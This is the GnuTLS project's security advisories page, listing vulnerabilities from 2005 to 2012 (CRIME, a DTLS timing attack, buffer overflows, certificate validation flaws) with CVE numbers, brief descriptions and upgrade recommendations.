Gnutls Logo

The GNU Transport Layer Security Library

  • Overview
  • News
  • Download
  • Mailing lists
  • Development
  • Documentation
  • Security advisories
  • Commercial support
  • Authors
  • About Security Advisories

    Although, the core GnuTLS team does not have resources to analyse the background and impact of security issues in depth, we do take security seriously. All known information on security incidents is collected and published in this page.

    Our idea is to turn writing security advisory into an open process where everyone can contribute. Everyone is invited to analyse the impact of discovered bugs, and, of course, also to study the code for new bugs.

    All serious analysis of bugs will be posted on this page.

    If this level of support is inadequate for your needs, customized commercial support is available.

  • Reporting security problems

    Send non-public reports to the maintainers. All other reports should be sent to one of the mailing lists.

  • Advisories
    Tag Severity Information
    GNUTLS-SA-2012-4
    "CRIME" attack
    CVE-2012-4929
    Possible plaintext recovery

    There is an attack on TLS called "CRIME" which takes advantage of compression and may recover plaintext under certain circumstances.

    Who is affected by this attack?

    • Clients or servers that use compression and provide the ability to an adversary to inject data (multiple times) in their session.

    How to mitigate the attack?

    • Do not enable compression (GnuTLS doesn't enable it by default)
    • When using compression use the CBC ciphers that include a random padding up to 255 bytes. That would increase the number of trials an attacker needs to perform significantly.

    Note that using compression provides information to an attacker on the plaintext.
    Security advisory
    A description of the attack
    Another analysis of the attack
    GNUTLS-SA-2012-3
    CVE-2012-1569
    Denial of service This vulnerability is in the libtasn1 library and affects the DER length decoding which is fixed in 2.12 release.
    Write-up by Mu Dynamics
    Recommendation: Upgrade to libtasn1 2.12.
    GNUTLS-SA-2012-2
    CVE-2012-1573
    Possible buffer overflow/Denial of service TLS record handling vulnerability fixed in GnuTLS 3.0.15.
    Write-up by Mu Dynamics
    Recommendation: Upgrade to GnuTLS 3.0.17 or 2.12.18.
    GNUTLS-SA-2012-1
    CVE-2012-0390
    Timing attack (DTLS) Announcement of GnuTLS 3.0.11
    The paper describing the attack
    This vulnerability allows an attacker to perform partial plaintext recovery using a timing attack in CBC-mode encryption. The attack is applicable to Datagram TLS (DTLS).
    Recommendation: Upgrade to GnuTLS 3.0.11.
    GNUTLS-SA-2011-2
    CVE-2011-4128
    Possible buffer overflow/Denial of service Mailing list discussion
    Note that this vulnerability is triggered by TLS clients that utilize the session resumption functions in a particular way. Clients that perform session resumption using the same steps as in the example code of GnuTLS documentation are not vulnerable. A preliminary analysis found no vulnerable clients. Recommendation: Upgrade to GnuTLS 3.0.7 or 2.12.14.
    GNUTLS-SA-2011-1
    Rizzo attack on TLS
    Plaintext recovery Mailing list discussion
    Recommendation: Make use of TLS 1.1 or TLS 1.2 protocols that are not vulnerable to the attack. TLS 1.1 is enabled by default in GnuTLS since version 2.0.0 (released in 2007). If this is not possible, disable CBC ciphers.
    GNUTLS-SA-2010-1
    CVE-2010-0731
    Remote Denial of Service RedHat bugzilla report
    Mailing list discussion

    This vulnerability is on a deprecated since 2006 version of GnuTLS. We keep the information here because this version was included in some distributions. Recommendation: Upgrade to the latest stable branch.

    GNUTLS-SA-2009-5
    CERT VU#120541
    CVE-2009-3555
    Plaintext injection attack Mailing list discussion

    Recommendation: Disable support for TLS renegotiation in application servers, or better upgrade to GnuTLS 2.10.x.

    GNUTLS-SA-2009-4
    CVE-2009-2730
    False positive in certificate hostname validation Announcement of v2.8.3 that solves the problem.
    Analysis of the vulnerability and minimal patch.
    How to check if your GnuTLS library is vulnerable.
    Back-ported patches for earlier releases: [1] [2]
    Recommendation: Upgrade to GnuTLS 2.8.3 or later.
    GNUTLS-SA-2009-3
    CVE-2009-1417
    No checking of certificate activation/expiration times Security advisory including patch
    Announcement of v2.6.6 that includes patch.
    Recommendation: Upgrade to GnuTLS 2.6.6 or later. If you still use the 2.4.x branch or earlier branches, apply the patch.
    GNUTLS-SA-2009-2
    CVE-2009-1416
    GnuTLS 2.6.x DSA keys are corrupt Security advisory including patch
    Announcement of v2.6.6 that includes patch.
    Recommendation: If you are using GnuTLS 2.6.x, upgrade to GnuTLS 2.6.6.
    GNUTLS-SA-2009-1
    CVE-2009-1415
    Double/invalid free in GnuTLS 2.6.x on certain errors Security advisory including patch
    Announcement of v2.6.6 that includes patch.
    Recommendation: If you are using GnuTLS 2.6.x, upgrade to GnuTLS 2.6.6.
    GNUTLS-SA-2008-3
    CVE-2008-4989
    Remote X.509 Trust Chain Validation error Announcement of v2.6.1 and patch
    Detailed analysis
    Announcement of v2.6.2 and updated patch.
    Announcement of updated patch and 2.6.3 release candidate.
    Announcement of v2.6.3.
    Announcement of v2.6.4 and v2.4.3.
    Recommendation: Upgrade to GnuTLS 2.6.4 or, if you still use the 2.4.x branch, 2.4.3, or later.
    GNUTLS-SA-2008-2
    CVE-2008-2377
    Local denial of service
    Server can trigger crash in GnuTLS clients?
    Announcement
    Detailed analysis and patch
    Another report that suggest it can be exploited by hostile servers
    Recommendation: Upgrade to GnuTLS 2.4.1 or apply the patch.
    GNUTLS-SA-2008-1
    CERT-FI announcement
    CVE-2008-1948, CVE-2008-1949, CVE-2008-1950
    Remote Denial of Service Announcement and Patch
    Updated announcement and Patch
    Recommendation: Upgrade to GnuTLS 2.2.5 or apply the patch in the second link.
    GNUTLS-SA-2006-4
    CVE-2006-4790
    (via NVD)
    False positive in verifying signature Announcement
    Updated patch
    Original report
    Recommendation: Upgrade to GnuTLS 1.4.4.
    GNUTLS-SA-2006-3
    None Announcement
    Bleichenbacher's Crypto 98 paper
    Recommendation: No action required, see the post where this advisory is essentially withdrawn.
    GNUTLS-SA-2006-2
    CVE-2006-7239
    Denial of service? Details
    Recommendation: Upgrade to GnuTLS 1.4.2.
    GNUTLS-SA-2006-1
    CVE-2006-0645
    Denial of service? Libtasn1 Announcement
    Recommendation: Upgrade to Libtasn1 0.2.18 and GnuTLS 1.2.10 (stable) or 1.3.4 (experimental).
    GNUTLS-SA-2005-1
    CVE-2005-1431
    Denial of service Announcement
    Write-up by Éric Leblond
    Recommendation: Upgrade to GnuTLS 1.0.25 or 1.2.3.
Please send FSF & GNU inquiries to gnu@gnu.org. There are also other ways to contact the FSF.
Please send broken links and other corrections or suggestions to bug-gnutls@gnu.org.

Copyright © 2011,2012 Free Software Foundation, Inc.

Verbatim copying and distribution of this entire article are permitted worldwide, without royalty, in any medium, provided this notice, and the copyright notice, are preserved.